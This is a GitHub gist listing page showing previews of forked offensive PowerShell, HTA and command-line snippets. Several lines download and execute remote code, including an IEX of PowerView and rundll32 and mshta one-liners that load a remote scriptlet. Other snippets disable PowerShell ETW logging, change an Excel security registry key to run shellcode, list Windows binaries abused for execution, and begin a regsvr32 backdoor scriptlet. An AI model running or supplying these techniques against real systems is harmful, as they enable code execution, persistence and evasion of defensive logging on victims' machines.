Skip to content

Instantly share code, notes, and snippets.

View H0K5's full-sized avatar

Az H0K5

72 followers · 346 following
View GitHub Profile
@H0K5
H0K5 / DPAPI.ps1
Created December 6, 2017 15:40 — forked from HarmJ0y/DPAPI.ps1
DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
@H0K5
H0K5 / instructions.txt
Created November 30, 2017 09:05 — forked from NickTyrer/instructions.txt
xwizard_sct
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
@H0K5
H0K5 / KillETW.ps1
Created November 28, 2017 22:44 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@H0K5
H0K5 / elgamal.ps1
Created November 28, 2017 16:42 — forked from khr0x40sh/elgamal.ps1
ElGamal Encryption in PowerShell
<#
ElGamal in PowerShell
by Casey Smith @subTee
The key generator works as follows:
Alice generates an efficient description of a cyclic group G of order q ,with generator g.
Alice chooses an x randomly from 1 - (q-1)
Alice computes h = g^x.
@H0K5
H0K5 / msf_install.sh
Created November 28, 2017 16:40 — forked from minkione/msf_install.sh
Install metasploit on Debian 8
# Install Oracle Java 8
apt-get install software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" && apt-get update
apt-get install oracle-java8-installer
# Installing Dependencies
apt-get update
apt-get upgrade
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
@H0K5
H0K5 / ExcelXLL.md
Created November 28, 2017 15:59 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@H0K5
H0K5 / CalcExcel.hta
Created November 28, 2017 15:26 — forked from Ridter/CalcExcel.hta
Shellcode Execution Via HTA
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
@H0K5
H0K5 / gist:992dab4a86276b98dddd0525621de9b5
Created November 9, 2017 16:59 — forked from trustedsec/gist:686057a1b8cdf3e580c57b211b263abe
List of applications for code execution via legit binaries
Rundll32.exe
Regsvr32.exe
Mshta.exe
Msbuild.exe
Cbd.exe
Csc.exe
Tracker.exe
Ntsd.exe
Bginfo.exe
Kd.exe
@H0K5
H0K5 / ServiceAclParser.ps1
Created September 24, 2017 11:49
Derivative class implementation using reflection
<#
# This won't compile using Add-Type in Nano Server TP5 due to
# a bug where it cannot determine the proper framework dir.
Add-Type -TypeDefinition @'
using System;
using System.Security.AccessControl;
namespace CimSweep
{
@H0K5
H0K5 / Backdoor-Minimalist.sct
Created September 16, 2017 06:49
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[